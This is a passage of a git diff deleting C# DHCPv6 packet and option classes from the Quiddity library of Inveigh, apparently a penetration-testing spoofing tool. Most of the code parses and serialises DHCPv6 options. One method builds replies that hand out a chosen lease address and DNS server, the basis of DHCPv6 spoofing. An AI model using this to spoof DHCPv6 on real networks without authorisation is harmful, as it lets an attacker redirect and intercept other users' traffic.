packetReader.ReadByte(); - this.TransactionID = packetReader.ReadBytes(3); - this.Options = packetReader.ReadBytes(data.Length - 4); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.MsgType); - packetWriter.Write(this.TransactionID); - packetWriter.Write(this.Options); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs deleted file mode 100644 index b3bd457..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/DHCPv6Packet.cs +++ /dev/null @@ -1,222 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Packet - { - public DHCPv6Message Message { get; set; } - public DHCPv6Option1 Option1 { get; set; } - public DHCPv6Option2 Option2 { get; set; } - public DHCPv6Option3 Option3 { get; set; } - public DHCPv6Option6 Option6 { get; set; } - public DHCPv6Option8 Option8 { get; set; } - public DHCPv6Option14 Option14 { get; set; } - public DHCPv6Option16 Option16 { get; set; } - public DHCPv6Option23 Option23 { get; set; } - public DHCPv6Option24 Option24 { get; set; } - public DHCPv6Option39 Option39 { get; set; } - - public DHCPv6Packet() - { - - } - - public DHCPv6Packet(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Packet(byte[] data, int offset) - { - ReadBytes(data, offset); - } - - public void ReadBytes(byte[] data, int offset) - { - this.Message = new DHCPv6Message(data); - - if (!Utilities.ArrayIsNullOrEmpty(this.Message.Options)) - { - - using (MemoryStream memoryStream = new MemoryStream(this.Message.Options)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - DHCPv6Option option = new DHCPv6Option(); - option.ReadBytes(this.Message.Options, 0); - - while (option.OptionCode != 0 && memoryStream.Length - memoryStream.Position >= 4) - { - option.ReadBytes(this.Message.Options, (int)memoryStream.Position); - - switch (option.OptionCode) - { - case 1: - this.Option1 = new DHCPv6Option1(this.Message.Options, (int)memoryStream.Position); - break; - - case 2: - this.Option2 = new DHCPv6Option2(this.Message.Options, (int)memoryStream.Position); - break; - - case 3: - this.Option3 = new DHCPv6Option3(this.Message.Options, (int)memoryStream.Position); - break; - - case 6: - this.Option6 = new DHCPv6Option6(this.Message.Options, (int)memoryStream.Position); - break; - - case 8: - this.Option8 = new DHCPv6Option8(this.Message.Options, (int)memoryStream.Position); - break; - - case 14: - this.Option14 = new DHCPv6Option14(this.Message.Options, (int)memoryStream.Position); - break; - - case 16: - this.Option16 = new DHCPv6Option16(this.Message.Options, (int)memoryStream.Position); - break; - - case 23: - this.Option23 = new DHCPv6Option23(this.Message.Options, (int)memoryStream.Position); - break; - - case 24: - this.Option24 = new DHCPv6Option24(this.Message.Options, (int)memoryStream.Position); - break; - - case 39: - this.Option39 = new DHCPv6Option39(this.Message.Options, (int)memoryStream.Position); - break; - } - - memoryStream.Position += option.OptionLen + 4; - } - - } - - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.Message.MsgType); - packetWriter.Write(this.Message.TransactionID); - - if (this.Option8 != null) - { - packetWriter.Write(this.Option8.GetBytes()); - } - - if (this.Option1 != null) - { - packetWriter.Write(this.Option1.GetBytes()); - } - - if (this.Option2 != null) - { - packetWriter.Write(this.Option2.GetBytes()); - } - - if (this.Option3 != null) - { - packetWriter.Write(this.Option3.GetBytes()); - } - - if (this.Option23 != null) - { - packetWriter.Write(this.Option23.GetBytes()); - } - - if (this.Option24 != null) - { - packetWriter.Write(this.Option24.GetBytes()); - } - - if (this.Option39 != null) - { - packetWriter.Write(this.Option39.GetBytes()); - } - - if (this.Option16 != null) - { - packetWriter.Write(this.Option16.GetBytes()); - } - - if (this.Option6 != null) - { - packetWriter.Write(this.Option6.GetBytes()); - } - - return memoryStream.ToArray(); - } - - } - - public byte[] GetBytes(byte msgType, string leaseAddress, string listenerMAC, string dnsServer, string dnsSuffix, uint lifetime, DHCPv6Packet dhcpv6Packet) - { - - this.Message = new DHCPv6Message - { - MsgType = msgType, - TransactionID = dhcpv6Packet.Message.TransactionID - }; - - this.Option1 = dhcpv6Packet.Option1; - this.Option2 = new DHCPv6Option2(listenerMAC); - this.Option3 = new DHCPv6Option3(leaseAddress, lifetime, dhcpv6Packet.Option3.IAID); - this.Option23 = new DHCPv6Option23(dnsServer); - - if (!String.IsNullOrEmpty(dnsSuffix)) - { - this.Option24 = new DHCPv6Option24(dnsSuffix); - } - - return GetBytes(); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option.cs deleted file mode 100644 index 6e630d1..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option.cs +++ /dev/null @@ -1,39 +0,0 @@ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option - { - public ushort OptionCode { get; set; } - public ushort OptionLen { get; set; } - - public DHCPv6Option() - { - - } - - public DHCPv6Option(byte[] data) - { - ReadBytes(data, 0); - } - - public void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs deleted file mode 100644 index cf34acc..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option1.cs +++ /dev/null @@ -1,88 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option1 : DHCPv6Option - { - public byte[] DUID { get; set; } - - public DHCPv6Option1() - { - - } - - public DHCPv6Option1(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option1(byte[] data, int index) - { - ReadBytes(data, index); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.DUID = packetReader.ReadBytes(this.OptionLen); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.OptionCode); - packetWriter.BigEndianWrite(this.OptionLen); - packetWriter.Write(this.DUID); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs deleted file mode 100644 index 6c50e47..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option14.cs +++ /dev/null @@ -1,86 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option14 : DHCPv6Option - { - - public DHCPv6Option14() - { - this.OptionCode = 14; - this.OptionLen = 0; - } - - public DHCPv6Option14(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option14(byte[] data, int index) - { - ReadBytes(data, index); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.OptionCode); - packetWriter.Write(this.OptionLen); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs deleted file mode 100644 index 606ee13..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option16.cs +++ /dev/null @@ -1,90 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option16 : DHCPv6Option - { - public uint EnterpriseNumber { get; set; } - public byte[] VendorClassData { get; set; } - - public DHCPv6Option16() - { - - } - - public DHCPv6Option16(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option16(byte[] data, int index) - { - ReadBytes(data, index); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.EnterpriseNumber = packetReader.BigEndianReadUInt32(); - this.VendorClassData = packetReader.ReadBytes(this.OptionLen - 8); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.OptionCode); - packetWriter.Write(this.OptionLen); - packetWriter.Write(this.EnterpriseNumber); - packetWriter.Write(this.VendorClassData); - return memoryStream.ToArray(); - } - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs deleted file mode 100644 index 6abb125..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option2.cs +++ /dev/null @@ -1,95 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option2 : DHCPv6Option - { - public byte[] DUID { get; set; } - - public DHCPv6Option2() - { - - } - - public DHCPv6Option2(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option2(byte[] data, int index) - { - ReadBytes(data, index); - } - - public DHCPv6Option2(string mac) - { - DHCPv6DUIDLL duid = new DHCPv6DUIDLL(mac); - this.OptionCode = 2; - this.DUID = duid.GetBytes(); - this.OptionLen = (ushort)this.DUID.Length; - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.DUID = packetReader.ReadBytes(this.OptionLen); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.OptionCode); - packetWriter.BigEndianWrite(this.OptionLen); - packetWriter.Write(this.DUID); - return memoryStream.ToArray(); - } - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs deleted file mode 100644 index 250bcef..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option23.cs +++ /dev/null @@ -1,97 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option23 : DHCPv6Option - { - // https://datatracker.ietf.org/doc/html/rfc3646 - public byte[] DNSRecursiveNameServers { get; set; } - public DHCPv6Option23() - { - - } - - public DHCPv6Option23(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option23(byte[] data, int index) - { - ReadBytes(data, index); - } - - public DHCPv6Option23(string dnsRecursiveNameServer) - { - this.OptionCode = 23; - this.OptionLen = 16; - this.DNSRecursiveNameServers = IPAddress.Parse(dnsRecursiveNameServer).GetAddressBytes(); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.DNSRecursiveNameServers = packetReader.ReadBytes(this.OptionLen); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.OptionCode); - packetWriter.BigEndianWrite(this.OptionLen); - packetWriter.Write(this.DNSRecursiveNameServers); - return memoryStream.ToArray(); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs deleted file mode 100644 index 5abbecb..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option24.cs +++ /dev/null @@ -1,95 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option24 : DHCPv6Option - { - public byte[] SearchList { get; set; } - - public DHCPv6Option24() - { - - } - - public DHCPv6Option24(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option24(byte[] data, int index) - { - ReadBytes(data, index); - } - - public DHCPv6Option24(string dnsSuffix) - { - this.OptionCode = 24; - this.SearchList = Utilities.GetDNSNameBytes(dnsSuffix, true); - this.OptionLen = (ushort)this.SearchList.Length; - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.SearchList = packetReader.ReadBytes(this.OptionLen); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.OptionCode); - packetWriter.BigEndianWrite(this.OptionLen); - packetWriter.Write(this.SearchList); - return memoryStream.ToArray(); - } - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs deleted file mode 100644 index 7641a32..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option3.cs +++ /dev/null @@ -1,107 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option3 : DHCPv6Option - { - public byte[] IAID { get; set; } - public uint T1 { get; set; } - public uint T2 { get; set; } - public byte[] IANAOptions { get; set; } - - public DHCPv6Option3() - { - - } - - public DHCPv6Option3(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option3(byte[] data, int index) - { - ReadBytes(data, index); - } - - public DHCPv6Option3(string clientIPv6Address, uint lifetime, byte[] iaid) - { - this.OptionCode = 3; - this.T1 = 200; - this.T2 = 250; - this.IAID = iaid; - this.IANAOptions = new DHCPv6Option5().GetBytes(clientIPv6Address, lifetime); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.IAID = packetReader.ReadBytes(4); - this.T1 = packetReader.BigEndianReadUInt32(); - this.T2 = packetReader.BigEndianReadUInt32(); - this.IANAOptions = packetReader.ReadBytes(this.OptionLen - 12); - } - - } - - public byte[] GetBytes() - { - this.OptionLen = 40; - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.OptionCode); - packetWriter.BigEndianWrite(this.OptionLen); - packetWriter.Write(this.IAID); - packetWriter.BigEndianWrite(this.T1); - packetWriter.BigEndianWrite(this.T2); - packetWriter.Write(this.IANAOptions); - 